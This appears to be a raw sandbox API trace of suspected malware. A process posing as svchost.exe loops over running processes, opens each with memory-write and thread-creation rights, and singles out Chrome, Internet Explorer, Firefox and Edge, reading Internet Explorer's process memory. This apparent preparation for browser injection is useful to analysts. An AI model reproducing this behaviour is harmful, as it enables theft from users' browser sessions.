	[0256.271] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xb270
	[0256.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.271] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0256.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.272] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.272] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0256.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.273] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.274] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0256.274] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xb274
	[0256.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.275] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0256.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.275] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.275] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0256.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.276] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.276] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0256.277] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xb278
	[0256.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.277] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0256.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.277] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0256.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.278] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0256.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.278] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.279] NtQueryInformationProcess (in: ProcessHandle=0xb278, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0256.279] ReadProcessMemory (in: hProcess=0xb278, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0256.279] ReadProcessMemory (in: hProcess=0xb278, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0256.279] ReadProcessMemory (in: hProcess=0xb278, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0256.279] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0256.279] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0256.280] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xb27c
	[0256.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.280] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0256.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.280] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0256.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.281] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0256.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.281] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.281] NtQueryInformationProcess (in: ProcessHandle=0xb27c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0256.281] ReadProcessMemory (in: hProcess=0xb27c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0256.281] ReadProcessMemory (in: hProcess=0xb27c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0256.282] ReadProcessMemory (in: hProcess=0xb27c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0256.282] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0256.282] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0256.283] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xb280
	[0256.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.283] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0256.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.283] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.283] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0256.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.284] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.284] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0256.285] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xb284
	[0256.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.285] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0256.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.285] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.285] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0256.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.286] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.286] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.287] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xb288
	[0256.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.287] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.287] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.288] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.288] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.288] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.289] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.290] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xb28c
	[0256.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.290] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.290] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.290] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.291] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.291] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.292] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xb290
	[0256.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.292] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.292] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.292] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.293] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.293] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0256.294] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xb294
	[0256.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.294] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0256.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.294] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.295] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0256.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.295] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.295] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.296] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xb298
	[0256.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.296] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.297] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.297] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.297] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.297] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.298] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xb29c
	[0256.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.298] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.299] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.299] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.299] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.300] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.300] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xb2a0
	[0256.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.300] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.301] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.301] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.301] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.302] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0256.302] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xb2a4
	[0256.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.303] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0256.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.303] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.303] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0256.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.303] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.303] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0256.304] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xb2a8
	[0256.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.304] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.305] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.305] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.305] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.306] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0256.306] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xb2ac
	[0256.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.306] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0256.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.307] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.307] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0256.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.307] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.307] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0256.308] CloseHandle (hObject=0x4fd0) returned 1
	[0256.308] Sleep (dwMilliseconds=0x64) 
	[0256.403] GetCurrentProcessId () returned 0x110
	[0256.403] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0256.450] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0256.450] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0256.451] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0256.452] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xb2b0
	[0256.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.452] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0256.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.452] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.453] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0256.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.453] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.453] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0256.454] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xb2b4
	[0256.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.454] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0256.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.454] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.455] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0256.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.455] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.455] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0256.456] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xb2b8
	[0256.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.456] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0256.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.456] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.457] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0256.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.457] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.457] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0256.458] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xb2bc
	[0256.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.458] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0256.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.458] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.459] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0256.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.459] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.459] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0256.460] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xb2c0
	[0256.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.460] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0256.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.460] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.461] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0256.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.461] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.461] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0256.462] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xb2c4
	[0256.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.462] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0256.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.462] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.463] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
